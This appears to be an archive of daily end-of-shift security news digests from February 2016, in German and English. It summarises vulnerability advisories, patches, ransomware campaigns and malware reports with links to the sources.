an *** --------------------------------------------- Administratoren, auf dessen Servern die beliebte Kryptobibliothek für SSL/TLS-Verbindungen zum Einsatz kommt, müssen am Dienstag wieder mal patchen. --------------------------------------------- http://heise.de/-3117855 *** Critical Vulnerabilities in Palo Alto Networks PAN-OS , (Thu, Feb 25th) *** --------------------------------------------- Yesterday, Palo Alto Networks released an update to PAN-OS, which addresses five different vulnerabilities [1]. The security researcher who identified the vulnerabilities will publish details about these issues at a conference on March 16th. You MUST patch affected systems before that date. Two of the vulnerabilities appear to be in particular dangerous, and affected devices should be patched immediately. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20767&rss *** Malicious websites exploit Silverlight bug that can pwn Macs and Windows *** --------------------------------------------- Malicious websites are exploiting a recently fixed vulnerability in Microsoft's Silverlight application framework to perform drive-by malware attacks on vulnerable visitor devices, a security researcher has determined. The critical code-execution vulnerability, which Microsoft patched last month, was actively exploited for two years in attack code owned by Italy-based exploit broker Hacking Team. --------------------------------------------- http://arstechnica.com/security/2016/02/malicious-websites-exploit-silverli…

1 0

Tageszusammenfassung - Mittwoch 24-02-2016
by Daily end-of-shift report 24 Feb '16

24 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 23-02-2016 18:00 − Mittwoch 24-02-2016 18:00 Handler: Robert Waldner Co-Handler: n/a *** Zahlreiche Hersteller patchen dramatische glibc-Lücke *** --------------------------------------------- Linux ist fast überall und dementsprechend verbreitet ist auch die glibc, die in älteren Versionen angreifbar ist. Sicherheits-Updates gibt es unter anderem von Zyxel, VMware und Citrix, andere geben Entwarnung. --------------------------------------------- http://heise.de/-3115787 *** OpenCms 9.5.2 Cross Site Scripting *** --------------------------------------------- Topic: OpenCms 9.5.2 Cross Site Scripting Risk: Low Text: Advisory ID: SYSS-2015-063 Product: OpenCms Official Maintainer: Alkacon Software GmbH Affected Version(s): 9.5.2 Tested ... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016020206 *** DFN-CERT-2016-0326/">Bibliothek libssh: Zwei Schwachstellen ermöglichen u.a. das Umgehen von Sicherheitsvorkehrungen *** --------------------------------------------- Zwei Schwachstellen in der Bibliothek libssh ermöglichen einem entfernten, nicht authentifizierten Angreifer das Durchführen eines Denial-of-Service (DoS)-Angriffs sowie das Umgehen von Sicherheitsvorkehrungen und in der Folge das Ausspähen von Informationen. --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0326/ *** Squid: Multiple Denial of Service issues in HTTP Response processing. *** --------------------------------------------- Due to incorrect bounds checking Squid is vulnerable to a denial of service attack when processing HTTP responses. --------------------------------------------- http://www.squid-cache.org/Advisories/SQUID-2016_2.txt *** Exploiting a Kernel Paged Pool Buffer Overflow in Avast Virtualization Driver *** --------------------------------------------- Version(s): 11.1.2245; possibly earlier versions Description: A vulnerability was reported in avast!. A local user can gain system privileges on the target system. Avast Internet Security, Avast Pro Antivirus, Avast Premier, and Avast Free Antivirus are affected. Solution: The vendor has issued a fix (11.1.2253). --------------------------------------------- http://www.securitytracker.com/id/1035093 *** Drupal 6 hits the end of the line *** --------------------------------------------- If you have a Drupal 6 website then you wont be receiving any more official security advisories or patches; from today your site is vulnerable to any new security issues discovered in Drupal 6 core or its modules, forever. --------------------------------------------- https://nakedsecurity.sophos.com/2016/02/24/drupal-6-hits-the-end-of-the-li… *** Admins aufgepasst: Krypto-Trojaner befällt hunderte Webserver *** --------------------------------------------- Der Erpressungs-Trojaner CTB-Locker hat es dieses Mal nicht auf Windows-Nutzer, sondern auf Webserver abgesehen. Er hat bereits Dateien hunderter Websites verschlüsselt, ein Ende ist derzeit nicht absehbar. --------------------------------------------- http://heise.de/-3116470 *** F5: sol13304944: NTP vulnerability CVE-2015-7974 *** --------------------------------------------- NTP 4.x before 4.2.8p6 and 4.3.x before 4.3.90 do not verify peer associations of symmetric keys when authenticating packets, which might allow remote attackers to conduct impersonation attacks via an arbitrary trusted key, aka a "skeleton key." (CVE-2015-7974) --------------------------------------------- https://support.f5.com/kb/en-us/solutions/public/k/13/sol13304944.html *** Analyzis of a Malicious .lnk File with an Embedded Payload, (Wed, Feb 24th) *** --------------------------------------------- We received some feedback today from Nick, aSANS ISC reader who detected an interesting phishing campaign based on an ACE file. I also detected the same kind of fileearlier this morning. ACE is an old compression algorithm developed by a German company called e-merge. This file format was popular around the year2000. Today it almost disappeared and was replaced by more popularformatsbut ACE files can still be handled by popular tools like WinRAR or WinZIP. The fact that the format is quite old --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20763&rss *** Attackers Can Turn Microsofts Exploit Defense Tool EMET Against Itself *** --------------------------------------------- itwbennett writes: FireEye researchers have found a way for exploits to trigger a specific function in EMET that disables all protections it enforces for other applications. The researchers believe that their new technique, which essentially uses EMET against itself, is more reliable and easier to use than any previously published bypasses. It works against all supported versions of EMET - 5.0, 5.1 and 5.2 - but Microsoft patched the issue in EMET 5.5, which was released on Feb. 2. --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/rwo8Nq2dFiw/attackers-can-t… *** Ransomware: Locky kommt jetzt auch über Jscript *** --------------------------------------------- Eine Spam-Kampagne verteilt die Locky-Ransomware jetzt auch über Jscript-Anhänge in E-Mails - die angeblich von einem Wursthersteller kommen. (Trojaner, Virus) --------------------------------------------- http://www.golem.de/news/ransomware-locky-kommt-jetzt-auch-ueber-javascript… *** Mousejacking: What you need to know *** --------------------------------------------- Got a wireless mouse or keyboards that uses a USB dongle? Seems that many of them can be fed fake clicks and keystrokes from a distance... --------------------------------------------- https://nakedsecurity.sophos.com/2016/02/24/mousejacking-what-you-need-to-k… *** Cisco ACE 4710 Application Control Engine Command Injection Vulnerability *** --------------------------------------------- A vulnerability in the Device Manager GUI of the Cisco ACE 4710 Application Control Engine could allow an authenticated, remote attacker to execute any command-line interface (CLI) command on the ACE with admin user privileges. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cleaners ought to be clean (and clear) *** --------------------------------------------- There are many programs that purport to clean up and optimize system performance. While Microsoft does not endorse the use of these tools with Windows, we do not view them as unwanted or malicious. Many programs in this category have a practice of providing a free version of their software that scans your system, ... --------------------------------------------- https://blogs.technet.microsoft.com/mmpc/2016/02/24/cleaners-ought-to-be-cl… *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in the IBM SDK for Node.js affect the Cordova tools in Rational Application Developer affecting Rational Developer for i and Rational Developer for AIX and Linux (CVE-2016-2086, CVE-2016-2216, *** http://www.ibm.com/support/docview.wss?uid=swg21977146 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSL affect the Cordova tools in Rational Application Developer affecting Rational Developer for i and Rational Developer for AIX and Linux (CVE-2016-0701, CVE-2015-3197) *** http://www.ibm.com/support/docview.wss?uid=swg21977144 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java SDK affects IBM Explorer for z/OS 3.0 (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976483 --------------------------------------------- *** IBM Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2016-0483, CVE-2016-0475, CVE-2016-0466, CVE-2015-7575, *** http://www.ibm.com/support/docview.wss?uid=swg21977021 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK Version 8 Service Refresh 2 that affect IBM BigFix Compliance Analytics. *** http://www.ibm.com/support/docview.wss?uid=swg21976854 --------------------------------------------- *** IBM Security Bulletin: Java specific SLOTH - Weak MD5 Signature Hash *** http://www.ibm.com/support/docview.wss?uid=swg21975823 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java Runtime shipped with WebSphere Partner Gateway Advanced/Enterprise editions (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976925 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Method Composer (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21975877 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java SDK affects Rational Developer for System z (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976476 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java affect IBM SPSS Modeler (CVE-2016-0466, CVE-2015-7575, CVE-2016-0475) *** http://www.ibm.com/support/docview.wss?uid=swg21977518 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java Runtime affects IBM WebSphere MQ (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21977523 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Runtime Environments Java Technology Edition, Versions 6, 7, 8 affect IBM Transformation Extender Hypervisor Edition for AIX (CVE-2016-0466, CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21977061 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Runtime Environments Java Technology Edition, Versions 6, 7, 8 affect IBM Transformation Extender Hypervisor Edition (CVE-2016-0466, CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976970 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect FileNet Content Manager, IBM Content Foundation and FileNet BPM (CVE-2015-7575, CVE-2016-0475, CVE-2016-0466) *** http://www.ibm.com/support/docview.wss?uid=swg21975820 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Tivoli Netcool/OMNIbus (Multiple CVEs) *** http://www.ibm.com/support/docview.wss?uid=swg21976845 --------------------------------------------- *** IBM Security Bulletin: Fixes available for Security Vulnerabilities in IBM WebSphere Portal *** http://www.ibm.com/support/docview.wss?uid=swg21976358 ---------------------------------------------

1 0

Tageszusammenfassung - Dienstag 23-02-2016
by Daily end-of-shift report 23 Feb '16

23 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 22-02-2016 18:00 − Dienstag 23-02-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** CVE-2016-0034 (Silverlight up to 5.1.41105.0) and Exploit Kits *** --------------------------------------------- http://malware.dontneedcoffee.com/2016/02/cve-2016-0034.html *** Incident Handling with Docker Containers *** --------------------------------------------- Honestly, I never really played with Docker but - For a few weeks, I succumbed to the temptation of playing with Docker thanks to a friend who's putting everything in docker containers. If you still don't know Docker, here is a very brief .. --------------------------------------------- https://blog.rootshell.be/2016/02/22/incident-handling-docker-to-the-rescue/ *** Is DNSSEC causing more problems than it solves? *** --------------------------------------------- New paper points to security protocol as vector for DDoS attacks The complex security protocol for the domain name system - DNSSEC - has another black mark against it: it is being used as a way to carry out denial-of-service (DDoS) .. --------------------------------------------- www.theregister.co.uk/2016/02/23/dnssec_more_problem_than_solution/ *** Ecommerce fraud surges 163% *** --------------------------------------------- The worst fears of online retailers has been confirmed with data just released today: in 2015, the number of attacks by fraudsters was up 163 percent - growing two and a half times in a mere three-quartered period. This data is part of the newly .. --------------------------------------------- https://www.helpnetsecurity.com/2016/02/23/ecommerce-fraud-surges-163/ *** Betrüger stahlen Grazer Unternehmen online 147.000 Euro *** --------------------------------------------- Unbekannte brachen in das Firmennetz ein und überwiesen den Betrag auf ein polnisches Konto. Das Geld ist verloren. --------------------------------------------- http://futurezone.at/b2b/betrueger-stahlen-grazer-unternehmen-online-147-00… *** 90% of SSL VPNs use insecure or outdated encryption, putting your data at risk *** --------------------------------------------- Have you ever thought how secure and reliable your SSL VPN? Probably you should. --------------------------------------------- https://www.htbridge.com/blog/90-percent-of-ssl-vpns-use-insecure-or-outdat… *** Mobile malware evolution 2015 *** --------------------------------------------- As the functionality of mobile devices and mobile services grows, the appetite of cybercriminals who profit from mobile malware will grow too. Malware authors will continue to improve their creations, develop new technologies and look for new ways of spreading mobile malware. Their main aim is to make money. --------------------------------------------- http://securelist.com/analysis/kaspersky-security-bulletin/73839/mobile-mal… *** Hackers arent so interested in your credit card data these days. Thats bad news *** --------------------------------------------- World governments now primary sources of breaches Healthcare and government have overtaken the retail sector as most-targeted for data breaches, according to security firm .. --------------------------------------------- www.theregister.co.uk/2016/02/23/breach_trends_gemalto/ *** Sicherheitsforscher: Gefahr durch Android-Banking-Trojaner größer denn je *** --------------------------------------------- Kaspersky sieht in einem Android-Trojaner "eine der größten Gefahren, die wir derzeit kennen“, während Sicherheitsexperten von IBM davon berichten, dass der Quellcode eines bekannten Trojaners veröffentlicht wurde. Ein Tutorial läd zum Ausprobieren ein --------------------------------------------- http://heise.de/-3115424 *** Two Charts That Demonstrate One Of Android's Big Security Problems *** --------------------------------------------- Applying the most recent security updates to your device's operating system is a best practice security fundamental. If you're not running the latest version of an OS, you're opening .. --------------------------------------------- https://labsblog.f-secure.com/2016/02/23/two-charts-that-demonstrate-one-of… *** Flaws in Wireless Mice and Keyboards Let Hackers Type on Your PC *** --------------------------------------------- Security researchers "mousejacking" attack exploits vulnerable wireless devices to type on a target PC from a hundred yards away. --------------------------------------------- http://www.wired.com/2016/02/flaws-in-wireless-mice-and-keyboards-let-hacke… *** Cisco Nexus 2000 Series Fabric Extender Software Default Credential Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** PowerPoint and Custom Actions *** --------------------------------------------- We've recently observed a Phishing attack which uses PowerPoint Custom Actions instead of macros to execute a malicious payload. Although using PowerPoint attachments is not new, these types of attacks are interesting as they generally bypass controls that assert on macro enabled Office attachments. --------------------------------------------- http://phishme.com/powerpoint-and-custom-actions/ *** TYPO3 CMS 6.2.19 and 7.6.4 released *** --------------------------------------------- https://typo3.org/news/article/typo3-cms-6219-and-764-released/

1 0

Tageszusammenfassung - Montag 22-02-2016
by Daily end-of-shift report 22 Feb '16

22 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 19-02-2016 18:00 − Montag 22-02-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** glibc: Neue Version repariert dramatische Lücke in Linux-Netzwerkfunktionen *** --------------------------------------------- Den kritische Fehler, den Angreifer zur Übernahme von Linux-Systemen nutzen konnten, hat das glibc-Team mit Version 2.23 offenbar behoben. Die anderen Änderungen wie Unicode-8-Support stehen im Schatten des Bugfix. --------------------------------------------- http://heise.de/-3112519 *** Joomla Sites Join WordPress As TeslaCrypt Ransomware Target *** --------------------------------------------- Joomla is the newest prey of attackers behind a campaign that has targeted WordPress websites by injecting JavaScript files with malicious code. --------------------------------------------- http://threatpost.com/joomla-sites-join-wordpress-as-teslacrypt-ransomware-… *** PCI DSS 3.2 slated for early 2016 *** --------------------------------------------- PCI DSS version 3.2, scheduled for release in the first half of 2016, likely March or April, will address the current threat landscape as well as "trending attacks causing compromises" detailed in current breach forensics reports. --------------------------------------------- http://www.scmagazine.com/pci-dss-32-slated-for-early-2016/article/478089/ *** Investigating a Compromised Server with Rootcheck *** --------------------------------------------- What do you do if you suspect your server (VPS or dedicated) has been compromised? If you are a customer, you have the option to leverage our team to perform the incident response on your behalf, but what if you want to do an investigation on your own? In this .. --------------------------------------------- https://blog.sucuri.net/2016/02/investigating-a-compromised-server-with-roo… *** Wie Privatleute von Online-Kriminellen zur Geldwäsche missbraucht werden *** --------------------------------------------- Kriminelle Banden nutzen unscheinbare Privatleute zur Geldwäsche. Neuerdings haben sie auch Flüchtlinge im Visier. An die Hintermänner kommt man kaum ran. --------------------------------------------- http://heise.de/-3112859 *** Security: Rätselhafter Anstieg von Tor-Adressen *** --------------------------------------------- Ein ungewöhnlicher Anstieg von .onion-Adressen im Tor-Netzwerk gibt zurzeit Rätsel auf. Grund für den Anstieg könnte eine neue Messaging-App sein - oder Malware. --------------------------------------------- http://www.golem.de/news/security-sprunghafter-anstieg-von-tor-adressen-160… *** Warning - Linux Mint Website Hacked and ISOs replaced with Backdoored Operating System *** --------------------------------------------- Are you also the one who downloaded Linux Mint on February 20th? You may have been Infected! Linux Mint is one of the best and popular Linux distros available today, but if you have downloaded and installed the operating system recently you .. --------------------------------------------- https://thehackernews.com/2016/02/linux-mint-hack.html *** DSA-3479 graphite2 - security update *** --------------------------------------------- Multiple vulnerabilities have been found in the Graphite font renderingengine which might result in denial of service or the execution ofarbitrary code if a malformed font file is processed. --------------------------------------------- https://www.debian.org/security/2016/dsa-3479 *** Synology NAS DSM 5.2 Remote Code Execution (RCE) *** --------------------------------------------- RCE in Synology NAS DSM 5.2 due to lack of input sanitisation. RCE triggered indirectly via port forwarding mechanism in the NAS UI. --------------------------------------------- http://rileykidd.com/2016/01/12/synology-nas-dsm-5-2-remote-code-execution-… *** A Skeleton Key of Unknown Strength *** --------------------------------------------- TL;DR: The glibc DNS bug (CVE-2015-7547) is unusually bad. Even Shellshock and Heartbleed tended to affect things we knew were on the network and knew we had to defend. This affects a universally used library (glibc) at a universally used protocol (DNS). Generic tools that we didn't even know had network surface (sudo) are thus exposed, as is software written in .. --------------------------------------------- http://dankaminsky.com/2016/02/20/skeleton/ *** Sicherheitsforscher: Piraten-App-Store vorübergehend in Apples App Store *** --------------------------------------------- Über mehrere Monate hat eine in Apples offiziellem Software-Laden erhältliche, als Übersetzungs-Tool getarnte iOS-App ihren Nutzern offenbar gecrackte Apps zum Download angeboten. --------------------------------------------- http://heise.de/-3113988 *** Deutschland: "Bundestrojaner" ist einsatzbereit *** --------------------------------------------- Nach monatelangen Vorbereitungen steht den Ermittlernin Deutschland eine eigene Software für Online-Durchsuchungen zur Verfügung. --------------------------------------------- http://futurezone.at/netzpolitik/deutschland-bundestrojaner-ist-einsatzbere… *** Neue Masche: Krypto-Trojaner Locky über Javascript-Dateien verbreitet *** --------------------------------------------- Nachdem der Verschlüsselungs-Trojaner zunächst vor allem über Office-Dateien verbreitet wurde, verschicken die Täter jetzt Skripte. Dadurch ist ein Ludwigsluster Wursthersteller unfreiwillig zur Anlaufstelle der Locky-Opfer geworden. --------------------------------------------- http://heise.de/-3113689

1 0

Tageszusammenfassung - Freitag 19-02-2016
by Daily end-of-shift report 19 Feb '16

19 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 18-02-2016 18:00 − Freitag 19-02-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Maimed Ramnit Still Lurking in the Shadow *** --------------------------------------------- https://www.fireeye.com/blog/threat-research/2016/02/maimed_ramnit_still.ht… *** ZDI-16-172: Google Chrome Pdfium JPEG2000 Out-Of-Bounds Read Remote Code Execution Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Google Chrome. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-16-172/ *** Mutliple vulnerabilities in SAP 3D Visual Enterprise Viewer SketchUp document *** --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-16-176/ http://www.zerodayinitiative.com/advisories/ZDI-16-175/ http://www.zerodayinitiative.com/advisories/ZDI-16-174/ http://www.zerodayinitiative.com/advisories/ZDI-16-173/ *** Krypto-Trojaner Locky wütet in Deutschland: Über 5000 Infektionen pro Stunde *** --------------------------------------------- Die neue Ransomware Locky findet hierzulande offenbar massenhaft Opfer, darunter auch ein Fraunhofer-Institut. Inzwischen haben die Täter ihrem Schädling sogar Deutsch beigebracht. --------------------------------------------- http://heise.de/-3111774 *** B+B SmartWorx VESP211 Authentication Bypass Vulnerability *** --------------------------------------------- This advisory contains mitigation details for an authentication bypass vulnerability in B+B SmartWorx's VESP211 serial servers. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-049-01 *** AMX Multiple Products Credential Management Vulnerabilities *** --------------------------------------------- This advisory contains mitigations details for hard-coded passwords in multiple AMX products. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-049-02 *** Privilege Escalation: Schon wieder Sicherheitslücke bei Comodo *** --------------------------------------------- Ein unsicheres Standardpasswort in der Comodo-Internet-Security-Suite ermöglicht es Angreifern, ihre Rechte zu erweitern, um beliebige Programme auszuführen. Auf dem Rechner selbst - aber möglicherweise auch aus der Ferne. --------------------------------------------- http://www.golem.de/news/privilege-escalation-schon-wieder-sicherheitslueck… *** Citrix NetScaler Application Delivery Controller and NetScaler Gateway Multiple Security Updates *** --------------------------------------------- http://support.citrix.com/article/CTX206001

1 0

Tageszusammenfassung - Donnerstag 18-02-2016
by Daily end-of-shift report 18 Feb '16

18 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 17-02-2016 18:00 − Donnerstag 18-02-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** WordPress Sites Leveraged in Layer 7 DDoS Campaigns *** --------------------------------------------- We first disclosed that the WordPress pingback method was being misused to perform massive layer 7 Distributed Denial of Service (DDoS) attacks back on March 2014. The problem, as previously described,was that any WordPress website with the pingback feature enabled (which is on by default) could .. --------------------------------------------- https://blog.sucuri.net/2016/02/wordpress-sites-leveraged-in-ddos-campaigns… *** Angler exploit kit generated by "admedia" gates, (Thu, Feb 18th) *** --------------------------------------------- On 2016-02-01, the Sucuri blog reported a spike in compromised WordPress sites generating hidden iframes with malicious URLs [1]. By 2016-02-02, I started seeing exploit kit (EK) traffic related to this campaign [2]. Sucuri noted that admedia was a common string used in malicious URLs generated by .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20741 *** SimpliSafe home alarms transmit PIN unlock codes in the clear - ideal for lurking burglars *** --------------------------------------------- How to break into hundreds of thousands of homes in America Pics and vid If youve got a SimpliSafe wireless home alarm system, as hundreds of thousands of homes in the US apparently do, then its time to buy a new alarm system because yours is screwed. --------------------------------------------- www.theregister.co.uk/2016/02/17/simplisafe_wireless_home_alarm_system_crac… *** Nodejs - Access bypass - Moderately Critical -- DRUPAL-SA-CONTRIB-2016-007 *** --------------------------------------------- The module doesn't disconnect unauthenticated sockets, allowing those sockets to receive broadcast messages. For sites that only serve authenticated pages, or only allows Node.js connections from authenticated users, the expectation is that only authenticated Drupal users will see broadcast messages. --------------------------------------------- https://www.drupal.org/node/2670636 *** Commerce Authorize.Net SIM/DPM Payment Methods - Access Bypass - DRUPAL-SA-CONTRIB-2016-006 *** --------------------------------------------- The module doesn't sufficiently protect against the premature triggering of order completion without successful payment by the manual entry of a specially-constructed URL which contains the correct payment redirect key. --------------------------------------------- https://www.drupal.org/node/2670632 *** Instagram rolls out two factor authentication *** --------------------------------------------- But SMS still a mess. Hipsters and selfie-lovers will enjoy extra security after Instagram added two-factor authentication to its service. --------------------------------------------- www.theregister.co.uk/2016/02/18/instagram_rolls_out_two_factor_authenticat… *** Funkregulierung: TP-Link muss WLAN-Firmware sperren *** --------------------------------------------- TP-Link sperrt die Firmware aller WLAN-Geräte. Andere Hersteller tun es wohl auch. Damit können User ihre Geräte nicht mehr warten. Das bewirkt die neue Funkregulierung auf beiden Seiten des Atlantik. --------------------------------------------- http://heise.de/-3109847 *** Gerichtlich angeordnete iPhone-Entsperrung: Google-Chef unterstützt Widerstand des Apple-Chefs *** --------------------------------------------- Google-Chef Sundar Pichai meint so wie Apple-Chef Tim Cook, falls sich das FBI durchsetze, dass Apple beim Entsperren eines iPhone zu helfen habe, werde ein riskanter Präzedenzfall geschaffen. --------------------------------------------- http://heise.de/-3109864 *** These were the Top 10 Android Threats in 2015 - Plus, What to Expect in 2016 *** --------------------------------------------- Mobile World Congress is next week and F-Secure is jazzed to be participating again - it promises to be another awesome expo. But while the tech world buzzes about which devices will be unveiled by the top handset makers, leave it to us to interrupt the conversation to remind you about security .. --------------------------------------------- http://safeandsavvy.f-secure.com/2016/02/18/these-were-the-top-10-android-t… *** DSA-3482 libreoffice - security update *** --------------------------------------------- An anonymous contributor working with VeriSign iDefense Labsdiscovered that libreoffice, a full-featured office productivitysuite, did not correctly handle Lotus WordPro files. This would enablean attacker to crash the program, or execute arbitrary code, bysupplying a specially crafted .. --------------------------------------------- https://www.debian.org/security/2016/dsa-3482 *** Ransomware: US-Krankenhaus zahlt 40 Bitcoins Lösegeld *** --------------------------------------------- Bitcoins im Wert von 15.000 Euro blätterte ein Krankenhaus in Los Angeles hin, um seine von einem Erpressungstrojaner verschlüsselten Daten wieder freizukriegen. Das sei der schnellste Weg gewesen, sagte der Krankenhaus-Chef. --------------------------------------------- http://heise.de/-3109956 *** VB2015 paper: Will Android Trojans, Worms or Rootkits Survive in SEAndroid and Containerization? *** --------------------------------------------- Sophos researchers Rowland Yu and William Lee look at whether recent security enhancements to Android, such as SEAndroid and containerization, will be enough to defeat future malware threats. --------------------------------------------- https://www.virusbulletin.com/blog/2016/02/vb2015-paper-will-android-trojan… *** A Letter to the Insiders - Think Twice *** --------------------------------------------- Insider threats come in many forms, from the unwitting to the negligent, and even the downright malicious. For those who may be unwillingly co-opted into cybercrime, either by subterfuge or coercion, we can provide education, technical measures, policies and processes that limit the risk. But what can .. --------------------------------------------- https://blog.team-cymru.org/2016/02/a-letter-to-the-insiders-think-twice/ *** New Ransomware PadCrypt: The first with Live Chat Support *** --------------------------------------------- A new ransomware has been discovered and what sets apart this variant from the rest is its implementation of a chat interface embedded into the product. That link for 'Live Chat' will prompt...read moreThe post New Ransomware PadCrypt: The first with Live Chat Support appeared first on Webroot Threat Blog. --------------------------------------------- http://www.webroot.com/blog/2016/02/18/new-ransomware-padcrypt-first-live-c…

1 0

Tageszusammenfassung - Mittwoch 17-02-2016
by Daily end-of-shift report 17 Feb '16

17 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 16-02-2016 18:00 − Mittwoch 17-02-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Cisco 1000 Series Connected Grid Routers SNMP BRIDGE MIB Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Stuxnet als erster Akt: USA wollten Iran mit Cyberangriff lahmlegen *** --------------------------------------------- Geheimprojekt "Nitro Zeus" hätte Infrastruktur zerstören sollen – außerdem detaillierte Pläne gegen Nuklearanlage .. --------------------------------------------- http://derstandard.at/2000031233923 *** Machine-Learning: Künstliche neuronale Netzwerke erleichtern Passwortcracking *** --------------------------------------------- Ein Machbarkeitsnachweis zeigt, dass künstliche neuronale Netzwerke mit etwas Training benutzt werden können, um Passwörter zu knacken. Selbst bei recht komplexen klappt das erstaunlich gut. --------------------------------------------- http://www.golem.de/news/machine-learning-kuenstliche-neuronale-netzwerke-e… *** Pwning CCTV cameras *** --------------------------------------------- CCTV is ubiquitous in the UK. A recent study estimates there are about 1.85m cameras across the UK - most in private premises. Most of those cameras will be connected to some kind of recording device, which these days means a Digital Video Recorder or DVR. --------------------------------------------- https://www.pentestpartners.com/blog/pwning-cctv-cameras/ *** Gerichtliche Anordnung zum iPhone-Entsperren: Apple-Chef Tim Cook widersetzt sich *** --------------------------------------------- Tim Cook hat sich ungewöhnlicherweise in einem offenen Brief an die Kunden gewandt. Darin begründet er, warum sich das Unternehmen weigert, dem FBI mit einer Hintertür bei Ermittlungen zu helfen. --------------------------------------------- http://heise.de/-3107769 *** Verheerender Fehler gefährdet fast alle Linux-Systeme *** --------------------------------------------- Fehler in der glibc kann zum Einschmuggeln von Code ausgenutzt werden - Update dringend empfohlen --------------------------------------------- http://derstandard.at/2000031281408 *** Linux Fysbis Trojan, a new weapon in the Pawn Storm's arsenal *** --------------------------------------------- Malware researchers at PaloAlto discovered the Fysbis Trojan, a simple and an effective Linux threat used by the Russian cyberspy group Pawn Storm. Do you remember the Pawn Storm hacking crew? Security experts have identified this group of Russian hackers with several names, including .. --------------------------------------------- http://securityaffairs.co/wordpress/44551/hacking/pawn-storm-linux-fysbis-t… *** Mazar: Forscher warnen vor mächtiger Android-Malware *** --------------------------------------------- Verwendet Tor-Netzwerk um Spuren zu verwischen - Kann volle Kontrolle �bernehmen, braucht aber reichlich Mitarbeit der Nutzer --------------------------------------------- http://derstandard.at/2000031296473 *** OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update *** --------------------------------------------- In May 2015, researchers at Qihoo 360 published a report on OceanLotus that included details about malware targeting Chinese infrastructure. In that report, there is a description about a piece of malware that targets OS X systems. A sample of that malware was uploaded to VirusTotal a few months .. --------------------------------------------- https://www.alienvault.com/open-threat-exchange/blog/oceanlotus-for-os-x-an… *** [HTB23284]: RCE via CSRF in osCommerce *** --------------------------------------------- High-Tech Bridge Security Research Lab discovered vulnerability in popular e-commerce software osCommerce with 280,000 store owners (according to the vendor). The vulnerability can be exploited to execute arbitrary PHP code on the remote system, compromise the vulnerable web application, its database and even the web server and related environment. --------------------------------------------- https://www.htbridge.com/advisory/HTB23284 *** [HTB23291]: SQL Injection in webSPELL *** --------------------------------------------- High-Tech Bridge Security Research Lab discovered two vulnerabilities in a popular CMS webSPELL developed for the needs of esport related communities. The vulnerability allows a remote authenticated attacker with cashbox access privileges to execute arbitrary SQL commands .. --------------------------------------------- https://www.htbridge.com/advisory/HTB23291 *** The Dridex Banking Trojan *** --------------------------------------------- Dridex is a generation of banking trojans, one of the most prominent threats for companies. A banking trojan basically is malicious software (malware) that tries to obtain confidential information from your computer system, targetting specifically online banking and payment systems. The Dridex trojan is equipped to steal all data necessary for fraudulent activities. --------------------------------------------- http://www.techknow.one/forum/index.php?topic=9346

1 0

Tageszusammenfassung - Dienstag 16-02-2016
by Daily end-of-shift report 16 Feb '16

16 Feb '16

